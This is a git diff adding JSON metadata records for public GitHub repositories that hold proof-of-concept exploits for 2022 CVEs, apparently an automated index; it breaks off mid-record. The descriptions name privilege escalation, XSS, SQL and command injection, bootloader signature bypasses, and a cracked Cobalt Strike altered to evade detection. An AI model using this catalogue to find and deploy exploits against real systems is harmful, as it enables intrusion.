--- /dev/null +++ b/2022/CVE-2022-37708.json @@ -0,0 +1,33 @@ +[ + { + "id": 540200274, + "name": "docker_lightman_exploit", + "full_name": "thekevinday\/docker_lightman_exploit", + "owner": { + "login": "thekevinday", + "id": 24626560, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24626560?v=4", + "html_url": "https:\/\/github.com\/thekevinday", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thekevinday\/docker_lightman_exploit", + "description": "Docker CVE-2022-37708", + "fork": false, + "created_at": "2022-09-22T23:06:08Z", + "updated_at": "2023-06-28T03:22:48Z", + "pushed_at": "2022-09-23T00:07:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3786.json b/2022/CVE-2022-3786.json new file mode 100644 index 0000000000..6623453fef --- /dev/null +++ b/2022/CVE-2022-3786.json @@ -0,0 +1,33 @@ +[ + { + "id": 587877422, + "name": "openssl-fuzz", + "full_name": "WhatTheFuzz\/openssl-fuzz", + "owner": { + "login": "WhatTheFuzz", + "id": 7316170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7316170?v=4", + "html_url": "https:\/\/github.com\/WhatTheFuzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WhatTheFuzz\/openssl-fuzz", + "description": "Finding CVE-2022-3786 (openssl) with Mayhem", + "fork": false, + "created_at": "2023-01-11T19:52:43Z", + "updated_at": "2024-10-21T08:35:46Z", + "pushed_at": "2023-01-11T19:55:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37969.json b/2022/CVE-2022-37969.json new file mode 100644 index 0000000000..f93b5fb1e3 --- /dev/null +++ b/2022/CVE-2022-37969.json @@ -0,0 +1,33 @@ +[ + { + "id": 611938110, + "name": "CVE-2022-37969", + "full_name": "fortra\/CVE-2022-37969", + "owner": { + "login": "fortra", + "id": 117669217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117669217?v=4", + "html_url": "https:\/\/github.com\/fortra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fortra\/CVE-2022-37969", + "description": "Windows LPE exploit for CVE-2022-37969", + "fork": false, + "created_at": "2023-03-09T21:17:44Z", + "updated_at": "2024-12-26T12:52:09Z", + "pushed_at": "2023-07-11T16:50:28Z", + "stargazers_count": 131, + "watchers_count": 131, + "has_discussions": false, + "forks_count": 40, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 40, + "watchers": 131, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38029.json b/2022/CVE-2022-38029.json new file mode 100644 index 0000000000..d607438701 --- /dev/null +++ b/2022/CVE-2022-38029.json @@ -0,0 +1,33 @@ +[ + { + "id": 880145667, + "name": "SIDECHANNEL-CVE-2022-38029", + "full_name": "SpiralBL0CK\/SIDECHANNEL-CVE-2022-38029", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/SIDECHANNEL-CVE-2022-38029", + "description": "SIDECHANNEL+CVE-2022-38029", + "fork": false, + "created_at": "2024-10-29T07:47:01Z", + "updated_at": "2024-11-11T13:17:36Z", + "pushed_at": "2024-10-29T07:52:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38181.json b/2022/CVE-2022-38181.json new file mode 100644 index 0000000000..baacd7a470 --- /dev/null +++ b/2022/CVE-2022-38181.json @@ -0,0 +1,95 @@ +[ + { + "id": 627438040, + "name": "CVE_2022_38181_Raven", + "full_name": "Pro-me3us\/CVE_2022_38181_Raven", + "owner": { + "login": "Pro-me3us", + "id": 106105250, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106105250?v=4", + "html_url": "https:\/\/github.com\/Pro-me3us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pro-me3us\/CVE_2022_38181_Raven", + "description": "CVE-2022-38181 POC for FireTV 2nd gen Cube (raven)", + "fork": false, + "created_at": "2023-04-13T13:19:04Z", + "updated_at": "2024-12-03T17:45:19Z", + "pushed_at": "2024-12-03T17:45:11Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 627440720, + "name": "CVE_2022_38181_Gazelle", + "full_name": "Pro-me3us\/CVE_2022_38181_Gazelle", + "owner": { + "login": "Pro-me3us", + "id": 106105250, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106105250?v=4", + "html_url": "https:\/\/github.com\/Pro-me3us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pro-me3us\/CVE_2022_38181_Gazelle", + "description": "CVE-2022-38181 POC for FireTV 3rd gen Cube (gazelle)", + "fork": false, + "created_at": "2023-04-13T13:25:09Z", + "updated_at": "2023-07-03T11:02:52Z", + "pushed_at": "2023-06-29T01:56:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 639906669, + "name": "CVE-2022-38181", + "full_name": "R0rt1z2\/CVE-2022-38181", + "owner": { + "login": "R0rt1z2", + "id": 39171306, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39171306?v=4", + "html_url": "https:\/\/github.com\/R0rt1z2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R0rt1z2\/CVE-2022-38181", + "description": null, + "fork": false, + "created_at": "2023-05-12T13:50:54Z", + "updated_at": "2024-10-04T17:59:18Z", + "pushed_at": "2023-07-03T20:49:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38374.json b/2022/CVE-2022-38374.json new file mode 100644 index 0000000000..958260863c --- /dev/null +++ b/2022/CVE-2022-38374.json @@ -0,0 +1,64 @@ +[ + { + "id": 570155803, + "name": "CVE-2022-38374", + "full_name": "azhurtanov\/CVE-2022-38374", + "owner": { + "login": "azhurtanov", + "id": 17701901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17701901?v=4", + "html_url": "https:\/\/github.com\/azhurtanov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/azhurtanov\/CVE-2022-38374", + "description": null, + "fork": false, + "created_at": "2022-11-24T13:13:08Z", + "updated_at": "2022-12-16T18:08:42Z", + "pushed_at": "2022-11-24T13:16:30Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 609274446, + "name": "CVE-2022-38374", + "full_name": "M4fiaB0y\/CVE-2022-38374", + "owner": { + "login": "M4fiaB0y", + "id": 95071636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95071636?v=4", + "html_url": "https:\/\/github.com\/M4fiaB0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M4fiaB0y\/CVE-2022-38374", + "description": null, + "fork": false, + "created_at": "2023-03-03T18:43:02Z", + "updated_at": "2023-03-04T02:51:43Z", + "pushed_at": "2023-03-03T18:46:21Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38553.json b/2022/CVE-2022-38553.json new file mode 100644 index 0000000000..52dfdf4d80 --- /dev/null +++ b/2022/CVE-2022-38553.json @@ -0,0 +1,33 @@ +[ + { + "id": 539043879, + "name": "CVE-2022-38553", + "full_name": "4websecurity\/CVE-2022-38553", + "owner": { + "login": "4websecurity", + "id": 114004967, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114004967?v=4", + "html_url": "https:\/\/github.com\/4websecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4websecurity\/CVE-2022-38553", + "description": "CROSS SITE SCRIPTING (XSS) ON \"ACADEMY LEARNING MANAGEMENT SYSTEM\" - PROOF OF CONCEPT (POC) CVE-2022-38553", + "fork": false, + "created_at": "2022-09-20T14:51:52Z", + "updated_at": "2022-09-24T12:42:03Z", + "pushed_at": "2022-09-20T15:41:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38577.json b/2022/CVE-2022-38577.json new file mode 100644 index 0000000000..b688381b88 --- /dev/null +++ b/2022/CVE-2022-38577.json @@ -0,0 +1,33 @@ +[ + { + "id": 539304215, + "name": "CVE-2022-38577-Processmaker", + "full_name": "sornram9254\/CVE-2022-38577-Processmaker", + "owner": { + "login": "sornram9254", + "id": 8232188, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8232188?v=4", + "html_url": "https:\/\/github.com\/sornram9254", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sornram9254\/CVE-2022-38577-Processmaker", + "description": "ProcessMaker before v3.5.4 was discovered to contain insecure permissions in the user profile page. This vulnerability allows attackers to escalate normal users to Administrators.", + "fork": false, + "created_at": "2022-09-21T04:29:42Z", + "updated_at": "2024-12-02T16:36:51Z", + "pushed_at": "2024-02-02T04:29:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38601.json b/2022/CVE-2022-38601.json new file mode 100644 index 0000000000..bf72d770f7 --- /dev/null +++ b/2022/CVE-2022-38601.json @@ -0,0 +1,33 @@ +[ + { + "id": 708832668, + "name": "CVE-2022-38601", + "full_name": "jet-pentest\/CVE-2022-38601", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2022-38601", + "description": "CVE-2022-38601", + "fork": false, + "created_at": "2023-10-23T13:34:53Z", + "updated_at": "2023-10-23T14:13:40Z", + "pushed_at": "2023-10-23T14:13:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38604.json b/2022/CVE-2022-38604.json new file mode 100644 index 0000000000..07182d2248 --- /dev/null +++ b/2022/CVE-2022-38604.json @@ -0,0 +1,54 @@ +[ + { + "id": 520518592, + "name": "CVE-2022-38604", + "full_name": "LucaBarile\/CVE-2022-38604", + "owner": { + "login": "LucaBarile", + "id": 74877659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74877659?v=4", + "html_url": "https:\/\/github.com\/LucaBarile", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucaBarile\/CVE-2022-38604", + "description": "Exploits and reports for CVE-2022-38604", + "fork": false, + "created_at": "2022-08-02T13:53:18Z", + "updated_at": "2024-03-02T17:42:10Z", + "pushed_at": "2023-04-05T13:35:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "arbitrary-file-deletion", + "denial-of-service", + "disclosure", + "elevation-of-privilege", + "exploit", + "impersonation", + "link-following", + "link-following-attack", + "local-privilege-escalation", + "mount-point", + "poc", + "proof-of-concept", + "symbolic-link", + "vulnerability", + "wacom", + "wacom-vulnerability", + "windows-denial-of-service", + "write-up", + "zero-day" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38691.json b/2022/CVE-2022-38691.json new file mode 100644 index 0000000000..4825248008 --- /dev/null +++ b/2022/CVE-2022-38691.json @@ -0,0 +1,36 @@ +[ + { + "id": 725940437, + "name": "CVE-2022-38691_38692", + "full_name": "TomKing062\/CVE-2022-38691_38692", + "owner": { + "login": "TomKing062", + "id": 12976017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12976017?v=4", + "html_url": "https:\/\/github.com\/TomKing062", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TomKing062\/CVE-2022-38691_38692", + "description": "Let's control Secure Boot Chain ourselves.", + "fork": false, + "created_at": "2023-12-01T07:32:18Z", + "updated_at": "2024-12-29T14:24:58Z", + "pushed_at": "2024-02-20T09:05:59Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "spreadtrum", + "unisoc" + ], + "visibility": "public", + "forks": 10, + "watchers": 46, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38694.json b/2022/CVE-2022-38694.json new file mode 100644 index 0000000000..e9a1fa8bfd --- /dev/null +++ b/2022/CVE-2022-38694.json @@ -0,0 +1,67 @@ +[ + { + "id": 651833898, + "name": "CVE-2022-38694_unlock_bootloader", + "full_name": "TomKing062\/CVE-2022-38694_unlock_bootloader", + "owner": { + "login": "TomKing062", + "id": 12976017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12976017?v=4", + "html_url": "https:\/\/github.com\/TomKing062", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TomKing062\/CVE-2022-38694_unlock_bootloader", + "description": "This is a one-time signature verification bypass. For persistent signature verification bypass, check https:\/\/github.com\/TomKing062\/CVE-2022-38691_38692", + "fork": false, + "created_at": "2023-06-10T08:31:26Z", + "updated_at": "2025-01-04T04:33:25Z", + "pushed_at": "2024-08-01T15:09:15Z", + "stargazers_count": 316, + "watchers_count": 316, + "has_discussions": true, + "forks_count": 46, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "spreadtrum", + "unisoc" + ], + "visibility": "public", + "forks": 46, + "watchers": 316, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 820964383, + "name": "Bootloader_Unlock_Anbernic_T820", + "full_name": "TheGammaSqueeze\/Bootloader_Unlock_Anbernic_T820", + "owner": { + "login": "TheGammaSqueeze", + "id": 116582950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116582950?v=4", + "html_url": "https:\/\/github.com\/TheGammaSqueeze", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheGammaSqueeze\/Bootloader_Unlock_Anbernic_T820", + "description": "Bootloader unlock using CVE-2022-38694 for Anbernic Unisoc T820 devices", + "fork": false, + "created_at": "2024-06-27T14:28:13Z", + "updated_at": "2024-12-10T09:48:51Z", + "pushed_at": "2024-10-15T10:16:57Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 28, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38725.json b/2022/CVE-2022-38725.json new file mode 100644 index 0000000000..2c59d6490d --- /dev/null +++ b/2022/CVE-2022-38725.json @@ -0,0 +1,33 @@ +[ + { + "id": 841578878, + "name": "CVE-2022-38725", + "full_name": "wdahlenburg\/CVE-2022-38725", + "owner": { + "login": "wdahlenburg", + "id": 4451504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4451504?v=4", + "html_url": "https:\/\/github.com\/wdahlenburg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wdahlenburg\/CVE-2022-38725", + "description": "Proof of Concept for CVE-2022-38725 against syslog-ng", + "fork": false, + "created_at": "2024-08-12T17:27:57Z", + "updated_at": "2024-08-12T18:32:01Z", + "pushed_at": "2024-08-12T18:31:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38766.json b/2022/CVE-2022-38766.json new file mode 100644 index 0000000000..a4ade93dad --- /dev/null +++ b/2022/CVE-2022-38766.json @@ -0,0 +1,33 @@ +[ + { + "id": 529328915, + "name": "CVE-2022-38766", + "full_name": "MalHyuk\/CVE-2022-38766", + "owner": { + "login": "MalHyuk", + "id": 59429883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59429883?v=4", + "html_url": "https:\/\/github.com\/MalHyuk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MalHyuk\/CVE-2022-38766", + "description": "PoC for vulnerability in Renault ZOE Keyless System(CVE-2022-38766)", + "fork": false, + "created_at": "2022-08-26T16:23:44Z", + "updated_at": "2022-08-26T16:22:08Z", + "pushed_at": "2022-10-07T13:05:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38789.json b/2022/CVE-2022-38789.json new file mode 100644 index 0000000000..eb8ce578b2 --- /dev/null +++ b/2022/CVE-2022-38789.json @@ -0,0 +1,33 @@ +[ + { + "id": 536572509, + "name": "Airties-CVE-2022-38789", + "full_name": "ProxyStaffy\/Airties-CVE-2022-38789", + "owner": { + "login": "ProxyStaffy", + "id": 113522001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113522001?v=4", + "html_url": "https:\/\/github.com\/ProxyStaffy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ProxyStaffy\/Airties-CVE-2022-38789", + "description": null, + "fork": false, + "created_at": "2022-09-14T12:43:05Z", + "updated_at": "2022-09-15T01:06:20Z", + "pushed_at": "2022-09-16T17:08:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-38813.json b/2022/CVE-2022-38813.json new file mode 100644 index 0000000000..fc820308f3 --- /dev/null +++ b/2022/CVE-2022-38813.json @@ -0,0 +1,33 @@ +[ + { + "id": 556286329, + "name": "CVE-2022-38813", + "full_name": "RashidKhanPathan\/CVE-2022-38813", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-38813", + "description": "Authenticated Vertical Privilege Escalation Vulnerability in Blood Donor Management System", + "fork": false, + "created_at": "2022-10-23T14:03:41Z", + "updated_at": "2024-12-19T15:23:33Z", + "pushed_at": "2022-10-23T15:46:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3904.json b/2022/CVE-2022-3904.json new file mode 100644 index 0000000000..11c00b7b5d --- /dev/null +++ b/2022/CVE-2022-3904.json @@ -0,0 +1,33 @@ +[ + { + "id": 665481628, + "name": "CVE-2022-3904", + "full_name": "RandomRobbieBF\/CVE-2022-3904", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-3904", + "description": "CVE-2022-3904 MonsterInsights < 8.9.1 - Stored Cross-Site Scripting via Google Analytics", + "fork": false, + "created_at": "2023-07-12T09:51:32Z", + "updated_at": "2024-08-12T20:32:06Z", + "pushed_at": "2023-07-12T10:18:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39066.json b/2022/CVE-2022-39066.json new file mode 100644 index 0000000000..37601b3ff6 --- /dev/null +++ b/2022/CVE-2022-39066.json @@ -0,0 +1,45 @@ +[ + { + "id": 577325573, + "name": "CVE-2022-39066", + "full_name": "v0lp3\/CVE-2022-39066", + "owner": { + "login": "v0lp3", + "id": 20267645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20267645?v=4", + "html_url": "https:\/\/github.com\/v0lp3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/v0lp3\/CVE-2022-39066", + "description": "Proof of concept of the SQL injection vulnerability affecting the ZTE MF286R router.", + "fork": false, + "created_at": "2022-12-12T13:45:21Z", + "updated_at": "2024-08-12T20:28:51Z", + "pushed_at": "2022-12-12T19:18:59Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "iot", + "mf286r", + "poc", + "proof-of-concept", + "router", + "sql-injection", + "sqli", + "sqlite3", + "zte" + ], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39073.json b/2022/CVE-2022-39073.json new file mode 100644 index 0000000000..c9a73d5ba6 --- /dev/null +++ b/2022/CVE-2022-39073.json @@ -0,0 +1,42 @@ +[ + { + "id": 586354436, + "name": "CVE-2022-39073", + "full_name": "v0lp3\/CVE-2022-39073", + "owner": { + "login": "v0lp3", + "id": 20267645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20267645?v=4", + "html_url": "https:\/\/github.com\/v0lp3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/v0lp3\/CVE-2022-39073", + "description": "Proof of concept for the command injection vulnerability affecting the ZTE MF286R router, including an RCE exploit.", + "fork": false, + "created_at": "2023-01-07T20:46:20Z", + "updated_at": "2024-09-06T19:37:20Z", + "pushed_at": "2023-01-07T20:54:07Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve-2022-39073", + "exploit", + "iot", + "mf286r", + "rce", + "router", + "zte" + ], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3910.json b/2022/CVE-2022-3910.json new file mode 100644 index 0000000000..0705b70a98 --- /dev/null +++ b/2022/CVE-2022-3910.json @@ -0,0 +1,64 @@ +[ + { + "id": 613743412, + "name": "CVE-2022-3910", + "full_name": "veritas501\/CVE-2022-3910", + "owner": { + "login": "veritas501", + "id": 25763545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4", + "html_url": "https:\/\/github.com\/veritas501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/veritas501\/CVE-2022-3910", + "description": "CVE-2022-3910", + "fork": false, + "created_at": "2023-03-14T07:22:25Z", + "updated_at": "2024-10-27T03:12:46Z", + "pushed_at": "2023-03-14T11:58:41Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 833901421, + "name": "CVE-2022-3910", + "full_name": "TLD1027\/CVE-2022-3910", + "owner": { + "login": "TLD1027", + "id": 103564619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103564619?v=4", + "html_url": "https:\/\/github.com\/TLD1027", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TLD1027\/CVE-2022-3910", + "description": "使用两种不同的角度实现对于CVE-2022-3910的利用", + "fork": false, + "created_at": "2024-07-26T02:21:08Z", + "updated_at": "2024-07-26T02:35:58Z", + "pushed_at": "2024-07-26T02:35:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39196.json b/2022/CVE-2022-39196.json new file mode 100644 index 0000000000..a7f1a0338a --- /dev/null +++ b/2022/CVE-2022-39196.json @@ -0,0 +1,33 @@ +[ + { + "id": 531864741, + "name": "CVE-2022-39196-", + "full_name": "DayiliWaseem\/CVE-2022-39196-", + "owner": { + "login": "DayiliWaseem", + "id": 105648077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105648077?v=4", + "html_url": "https:\/\/github.com\/DayiliWaseem", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DayiliWaseem\/CVE-2022-39196-", + "description": "Black board CMS Escalation of Privileges", + "fork": false, + "created_at": "2022-09-02T09:35:35Z", + "updated_at": "2022-09-02T09:35:35Z", + "pushed_at": "2022-09-02T09:58:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39197.json b/2022/CVE-2022-39197.json new file mode 100644 index 0000000000..0064d7f444 --- /dev/null +++ b/2022/CVE-2022-39197.json @@ -0,0 +1,479 @@ +[ + { + "id": 539337304, + "name": "CVE-2022-39197", + "full_name": "safe3s\/CVE-2022-39197", + "owner": { + "login": "safe3s", + "id": 108328094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108328094?v=4", + "html_url": "https:\/\/github.com\/safe3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safe3s\/CVE-2022-39197", + "description": "CVE-2022-39197", + "fork": false, + "created_at": "2022-09-21T06:22:10Z", + "updated_at": "2023-04-24T13:24:18Z", + "pushed_at": "2022-09-21T06:42:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": true, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 539771310, + "name": "cobaltstrike4.5_cdf-1", + "full_name": "zeoday\/cobaltstrike4.5_cdf-1", + "owner": { + "login": "zeoday", + "id": 112299608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112299608?v=4", + "html_url": "https:\/\/github.com\/zeoday", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zeoday\/cobaltstrike4.5_cdf-1", + "description": "cobaltstrike4.5版本破\/解、去除checksum8特征、bypass BeaconEye、修复错误路径泄漏stage、增加totp双因子验证、修复CVE-2022-39197等", + "fork": false, + "created_at": "2022-09-22T02:50:45Z", + "updated_at": "2022-09-22T19:46:17Z", + "pushed_at": "2022-09-22T02:00:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 